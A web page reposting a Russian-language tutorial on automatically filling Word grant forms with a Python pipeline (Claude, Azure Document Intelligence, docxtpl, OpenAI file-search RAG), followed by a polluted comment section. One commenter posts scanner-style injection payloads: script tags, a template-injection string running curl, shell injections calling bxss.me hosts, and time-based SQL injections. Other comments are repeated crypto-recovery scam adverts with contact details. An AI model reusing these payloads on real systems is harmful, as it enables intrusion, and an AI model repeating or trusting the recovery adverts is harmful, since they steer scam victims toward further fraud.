Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9512 / Markets: 114689
Market Cap: $ 3 787 132 962 593 / 24h Vol: $ 200 392 171 953 / BTC Dominance: 58.653467328398%

Н Новости

Мне надоело заполнять Word формы и теперь это делает ИИ

57f6905401b72c09fe366513c6100989.png

Привет, Хабр! Сегодня расскажу про автоматизированную технологию заполнения Word форм используя ИИ

TLDR: Весь исходный код здесь

Введение

Я подаюсь на грант Студенческий стартап от Фонда Содействия Инновациям с другим своим ИИ проектом. Но мне так лень со скрупулёзностью сверять правильность заполнения каждого поля и придумывать формулировки к для меня очевидным полям. Поэтому я захотел поручить ИИ сделать это за меня, скормив ему файлы о моем проекте

В целом это общая проблема - заполнение типовых анкет, резюме, договоров, заявлений, отчетов, счетов на основе информации из других документов

На данный момент апреля 2025 года, ИИ сложно получается в прямом редактировании Word (хотя сейчас весь мир работает над возможностью ИИ взаимодействовать со средой - это и новый автономный ИИ агент Manus, и не очень применимый Operator от OpenAI, и попытки управлять через встроенные API приложений MCP протоколом). А пытаться генерировать word целиком через ChatGPT не очень хорошая идея - он все генерирует в формате markdown без сохранения исходной разметки и форматирования документа

Но у LLM хорошо получается выдавать текст в определенном формате. Поэтому задача сводится к тому, чтобы спросить ИИ по заполнению каждого поля и вставить результат в предопределенные местозаполнители в Word форме

Решение

Разобью задачу на несколько отдельных пунктов

  1. Просканировать исходную пустую форму и составить json файл характеристик (метаданных) каждого поля в ней

  2. Разметить форму местозаполнителями. Проверить на фейковых данных

  3. В цикле просить ИИ заполнить поле по данным характеристикам. Собрать результаты в словарь id_поля: ответ. Подставить результаты в форму по id_поля

Разберем все по этапам

Этап 1. Анализ формы

Прежде чем что-то заполнять, нужно проанализировать форму

Берем Word форму. Если нет, переконвертируем из pdf, например здесь. Смотрим. Обычно форма состоит из секций (раздел о себе, раздел бюджета, раздел календарного план), а они из полей. Для каждого поля нужно формировать уникальный id в рамках секции, описание, тип, формат, ограничения по заполнению

Структура любой формы состоит из секций и полей
Структура любой формы состоит из секций и полей

Одни и те же поля могут повторяться, то есть быть в виде списка. Например список “Список ссылок соц сетей” или “список целей”

Бывают комплексные поля. То есть те, которые состоят из нескольких. Например в некоторых полях ФИО заполняется не одной строкой, а 3 отдельными - фамилия, имя, отчество. Бывают таблицы. В своей сути, их можно представить просто как список комплексных полей

Короче любую форму можно описать с помощью следующих Pydantic классов (файл models.py):

from enum import Enum

from pydantic import BaseModel, Field


class FormFieldType(Enum):
    """Тип поля:
    select - выбрать один вариант из предложенных
    multiselect - выбрать несколько вариантов из предложенных
    text - текстовое поле
    number - числовое поле
    boolean - указать "Да" или "Нет"
    file - прикрепить файл
    link - прикрепить ссылку
    date - указать дату
    phone - указать номер телефона
    email - указать email
    complex - состоит из нескольких полей других типов
    """
    Select = "select"
    Multiselect = "multiselect"
    Text = "text"
    Number = "number"
    Boolean = "boolean"
    File = "file"
    Link = "link"
    Date = "date"
    Phone = "phone"
    Email = "email"
    Complex = "complex"


class FormField(BaseModel):
    """Поле в форме. Может содержать внутри себя другие поля"""
    id: str = Field(description="Цифровой номер (присвой текстовой id если нет номера)")
    description: str = Field(description="Описание и подсказки для заполнения поля")
    type: FormFieldType = Field(description="Тип поля")
    required: bool = Field(description="Поле обязательно для заполнения")

    options: list[str] | None = Field(description="Варианты выбора (для типа select)", default=None)
    maxLength: int | None = Field(description="Максимальная длина текста в символах (для типа text)", default=None)
    is_repeated: bool = Field(description="Поле повторяется несколько раз?", default=False)
    maxCount: int | None = Field(description="Максимальное количество", default=None)
    fileTypes: list[str] | None = Field(description="Разрешенные форматы файлов (для типа file)", default=None)
    dateFormat: str | None = Field(description="Формат возвращаемой даты (для типа date)", default=None)
    fields: list["FormField"] | None = Field(description="Внутренние поля (для типа complex)", default=None)


class FormSection(BaseModel):
    """Секция формы"""
    id: str = Field(description="Цифровой номер (или название) секции в документе")
    title: str = Field(description="Заголовок секции")
    fields: list[FormField] = Field(description="Заполняемые поля секции")

class FillForm(BaseModel):
    """Форма для заполнения"""
    title: str = Field(description="Заголовок формы")
    sections: list[FormSection] = Field(description="Секции, из которых состоит форма")

Для каждого Pydantic атрибута пишу поле description и составляю подробную документацию для нейросети. Да, кстати, анализировать форму и формировать json файл с полным описанием полей будет тоже нейросеть. Мы подадим эту Pydantic модель и используем structured_output мод, который гарантированно вернет нам в структурированном виде

Использую Claude Sonnet 3.7 для этой задачи. Во-первых она понимает значения по умолчанию default=… (которые open ai и gemini почему-то не принимают). Во-вторых у нее достаточно большой максимальное количество входных (200К) и выходных (64К) токенов

Можно попробовать gemini (она бесплатна в использовании!), но у нее ограничение на выходные токены в 8192 символов - для длинных форм не сработает

Все нейросетки использую с Proxy или поставщиками: GPTunnel.ru, Proxyapi.ru, OpenRouter.ai. Также использую Azure Document Intelligence - он позволяет извлекать содержимое .docx файла в обычную строку, которую можно подать на вход нейросети для анализа (инструкция как настроить). Кстати, Microsoft дает 500 страниц разбора текста бесплатно за месяц что для личных целей более чем достаточно

Вот схема пайплайна разбора заявки. Администратор - тот, кто готовит форму. Он запускает программу на форму, где из нее извлекается текст через Azure Document Intelligence, который затем подается ИИ Claude Sonnet 3.7. Он в свою очередь возвращает структурированный вывод, который мы можем сохранить в формате json. Также Администратор должен подготовить Шаблон (см. этап 2)

Схема пайплайна разбора заявки
Схема пайплайна разбора заявки

Вот код. Использую библиотеку langchain для удобного использования AzureAIDocumentIntelligenceLoader и ChatAnthropic со структурированным выводом

from langchain_anthropic import ChatAnthropic
from langchain_community.document_loaders import AzureAIDocumentIntelligenceLoader
from langchain_core.prompts import PromptTemplate

from config import AZURE_DOCUMENT_INTELLIGENCE_ENDPOINT, AZURE_DOCUMENT_INTELLIGENCE_KEY
from models import FillForm

form_analyzer_template = """
Есть следующая форма для заявки:
{doc}
---
Напиши json структуру полей этой формы. Постарайся максимально точно отразить заполняемые поля по данной структуре, удобной для последующего автоматического заполнения, при этом не вводя лишние поля.
Дели форму на секции и поля. Не обращай внимания на подпункты
В ответе перечисли только те поля структуры, которые не равны null или значению по-умолчанию
"""

form_analyzer_prompt = PromptTemplate(
    template=form_analyzer_template,
    input_varialbes=["doc"],
)

model = ChatAnthropic(model='claude-3-7-sonnet-latest', temperature=0, timeout=None, max_tokens=64000)


form_analyzer_chain = (form_analyzer_prompt | model.with_structured_output(FillForm)).with_config(
    run_name="Form Analyzer")


async def parse_document(doc: bytes) -> FillForm:
    loader = AzureAIDocumentIntelligenceLoader(
        api_endpoint=AZURE_DOCUMENT_INTELLIGENCE_ENDPOINT,
        api_key=AZURE_DOCUMENT_INTELLIGENCE_KEY,
        bytes_source=doc,
        api_model="prebuilt-layout"
    )

    documents = await loader.aload()
    logger.logger("Azure Document Intelligence разобран")
    document_content = documents[0].page_content

    return await form_analyzer_chain.ainvoke({"doc": document_content})

Запускаю код на своей форме. Готово! Сохраненный json файл с метаданными полей представляет что-то подобное

e26ab78ee68aef190e90beeef2eaa782.png

Этап 2. Подготовка шаблона для заполнения

Дальше встает вопрос - как можно заполнить word документ через Python? Поможет библиотека docxtpl - смесь шаблонизатора Jinja2 и редактора Word файлов python-docx. Мы будем использовать сгенерированные нейросетью idшники в качестве тегов в исходной форме.

Следуя Jinja2-like синтаксису вручную проставляем каждый тег в документе. Имя тега формируем как field_{<id секции>_<id поля>. Для таблиц немного посложнее, но можно посмотреть мой пример в репозитории и примеры из документации.

Получаю список id-шников с помощью написанной утилитки

9a4bf05c1f032fa5b8c39dbe2b5a0fe6.gif

Размечаю Word файл

Фрагмент размеченной Word формы. Заполняемые поля помечаю желтым цветом, чтобы различать, что было сгенерировано ИИ
Фрагмент размеченной Word формы. Заполняемые поля помечаю желтым цветом, чтобы различать, что было сгенерировано ИИ

Отлично! Теперь могу объявлять объект шаблона doc_template = DocxTemplate(template_path). У него есть удобный метод doc_template.get_undeclared_template_variables() , который позволяет получить все теги в шаблоне. Используя его написал утилиту проверки файла на совпадение с json метаданными. Запускаем ее

16fe65d10bbac4062f452f5ed87ea688.gif

Исправляем неправильные теги. Запускаем проверку снова

c6c6602fdd8b131d9e3c102dfe51edb5.gif

Супер. Можно пробовать заполнить данными. Заполнение Word формы в docxtpl делается через метод doc_template.render(data), куда в качестве data нужно передать словарь “тэг”: значение. Затем заполненный уже документ можно сохранить как файл через doc_template.save(output_path)

Для заполнения размеченной формы фейковыми данными тоже есть скрипт

Скрипт не очень оригинально но заполнил форму фейковыми данными. На этом этапе нужно просмотреть все поля - если какие-то из них пустые, значит где то еще есть ошибки
Скрипт не очень оригинально но заполнил форму фейковыми данными. На этом этапе нужно просмотреть все поля - если какие-то из них пустые, значит где то еще есть ошибки

Все подготовили, теперь переходим к самому интересному - заполнение с ИИ

Этап 3. Заполнение ИИ

Как я сказал в введении, имеет смысл заполнять поля спрашивая ChatGPT по одному. При этом важно это делать в одном чате, чтобы модель понимала контекст и заполняла форму взаимосвязано. Формировать промпт мы будем автоматически, исходя из метаданных полей.

Чтобы заполняемые данные были подкреплены реальными документами (описания, презентации, уставы, чеки) нам нужно также сделать RAG - Retrieval Augmented Generation, когда перед генерацией ИИ каждый раз на ему на вход подаются несколько актуальных к вопросу документов.

Все перечисленные идеи изображены на следующей схеме

55a1b68b7279b29ac905faf9c5cc1608.png

Для реализации мы можем воспользоваться API от OpenAI. Помимо обычного Responses API, компания предоставляет также возможность создавать свои RAG через File Search API. По прайсу это совсем не дороже вызова, а если после заполнения чистить файлы, то выйдет еще дешевле. Дополнительные ссылки: поддерживаемые разрешения файлов и видео про OpenAI vector_store

Алгоритм ИИ заполнения формы используя API OpenAI
Алгоритм ИИ заполнения формы используя API OpenAI

Давайте сделаем это. Устанавливаю Python клиент openai. Прописываю функции загрузки файлов и работы с vector_store. В sdk от openai есть удобный метод client.vector_stores.files.upload_and_poll, которая загружает файл и сразу прикрепляет его к векторному хранилищу. Воспользуемся ей, передав id ранее созданного vector_store

async def add_files(client: AsyncOpenAI, vector_store_id: str, files: list[str]) -> list[str]:
    errors = []
    files_ids = []
    for file in files:
        with open(file, "rb") as f:
            file_content = (file.split("/")[-1], f.read())
        try:
            file_response = await client.vector_stores.files.upload_and_poll(vector_store_id=vector_store_id, file=file_content)
        except Exception as e:
            errors.append((file, e))
        else:
            files_ids.append(file_response.id)
            if file_response.status == "failed":
                errors.append((file, file_response.last_error.message))
    if errors:
        raise IncorrectFilesException(files_ids, errors)
    return files_ids


async def delete_files(client: AsyncOpenAI, files_ids: list[str]) -> None:
    for file_id in files_ids:
        try:
            await client.files.delete(file_id)
        except:
            continue


async def delete_vector_store(client: AsyncOpenAI, vector_store_id: str):
    try:
        await client.vector_stores.delete(vector_store_id=vector_store_id)
    except:
        pass


async def clear_openai_storage(client: AsyncOpenAI, files_ids, vector_store_id):
    if files_ids:
        await delete_files(client, files_ids)
        logger.info("files deleted")
    if vector_store_id:
        await delete_vector_store(client, vector_store_id)
        logger.info("vector store deleted")

Код генерации одного поля. Здесь в системном промпте задаю ИИ формат ответа “<мысли> ОТВЕТ: <значение>”. В качестве пользовательского промпта генерирую требования под метаданные поля. В prompt_ai для удобства вынес непосредственно код обращения к API генерации. Также добавил механизм повторения неудачных запросов для надежности

Всю историю генераций вручную накапливаю с помощью списка messages. Конечный ответ парсится из строки возвращаемой ИИ по ключевому слову “Ответ:”

SYSTEM_PROMPT = """Ты помощник в заполнении формы "{}". Ты помогаешь пользователю заполнять форму, отвечая на его вопросы по проекту на основе документов. Если ответа на вопрос в документах не указано, оставь ответ пустым.
Прочитай внимательно требования пользователя к ответу, подумай шаг за шагом, напиши свои рассуждения и в конце дай ясный ответ соответствующий требованиям в формате \"Ответ: <твой ответ>\"
Твои ответы будут напрямую вставлены в форму. Начинай отвечать на вопросы пользователя"""

@traceable
@retry(stop=stop_after_attempt(3), wait=wait_exponential(multiplier=1, min=20, max=80))
async def prompt_ai(client: AsyncOpenAI, messages: list[dict[str, str]], vector_store_id: str) -> str:
    response = await client.responses.create(
        model=MODEL,
        input=messages,
        temperature=0,
        tools=[{
            "type": "file_search",
            "vector_store_ids": [vector_store_id]
        }]
    )
    return response.output[-1].content[0].text

async def prompt_ai_field(client: AsyncClient, field_key: str, field: dict, messages: list, vector_store_id: str, extra_description="") -> dict[str, Any]:
    prompt = "Вопрос: " + generate_prompt(field, extra_description)
    messages.append({"role": "user", "content": prompt})
    logger.info(f"{field_key} PROMPT: {prompt}")
    ai_message_text = await prompt_ai(client, messages, vector_store_id)
    logger.info(f"{field_key} AI RESPONSE: {ai_message_text}")
    messages.append({"role": "assistant", "content": ai_message_text})
    output = parse_answer(field, ai_message_text)
    return {field_key: output}

Итак, подготовив отдельно части, вот весь алгоритм заполнения формы. В нем предусмотрен fallback механизм - любой исход выполнения кода будет прежде чем завершать программу обязательно чистить vector_store и files в openai

async def word_fill_command(schema_path: str, template_path: str, file_paths: list[str], output_path: str):
    # Загрузка JSON схемы
    with open(schema_path, 'r', encoding='utf-8') as f:
        input_data = json.load(f)

    vector_store_id = None
    files_ids = None
    client = None

    try:
        client = create_client()

        vector_store_id = await create_vector_store(client)
        logger.info("vector store created")
        files_ids = await add_files(client, vector_store_id, file_paths)
        logger.info("files uploaded")
        answers = await ai_generate_fill_form(client, input_data, vector_store_id)
        doc_template = DocxTemplate(template_path)
        doc_template.render(answers)
        doc_template.save(output_path)
    except IncorrectFilesException as files_ex:
        print(f"❌ {files_ex}", file=sys.stderr)
        files_ids = files_ex.files_ids
    except RetryError as e:
        print(f"Достигнуты лимиты OpenAI", file=sys.stderr)
    except Exception as ex:
        print(f"❌ {ex}", file=sys.stderr)
    else:
        print(f"✅ Форма успешно заполнена")
    finally:
        await clear_openai_storage(client, files_ids, vector_store_id)

Запуск

Опробуем код на заполнение моей формы. Запускаю. Спустя 19 минут форма была полностью заполнена, учитывая что она состоит из 73-ех разных вопросов

Фрагмент заполненной формы
Фрагмент заполненной формы

По цене на заполнение одной формы моделью gpt4.1-mini потратилось $0.74 за input + $0,04 за output + $0,23 за RAG = $1.01 в сумме

Дальнейшие улучшения

Не хочется сливать свои уязвимые данные третьему лицу OpenAI? Без проблем - разворачиваем локальную модель на Ollama, делаем RAG с ним и убираем все внешние API нейросетей. Кстати можно попробовать еще Yandex AI Assistant API - он как и OpenAI предоставляет создание RAG и генерации на его основе

Не нравиться CLI? Оформляем в виде сервера на Fast API, делаем клиент-серверную архитектуру, пишем удобный интерфейс под десктоп, веб.

Заключение

Итак в этом хабре я детально рассказал технологию автоматического заполнения любой Word формы используя ИИ и на примере заполнил свою форму. ИИ не панацея - он галлюцинирует, допускает ошибки и не пишет идеально. Но в качестве наброска, первой черновой версии, которая потом будет проходить через человека - работает на ура. Весь исходный код вы можете найти здесь.

Подписывайтесь на мой телеграм канал - рассказываю про разное интересное применение ИИ в бизнес-задачах подобно этой статье

Пишите свои идеи и мнения в комментариях. Спасибо!

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, 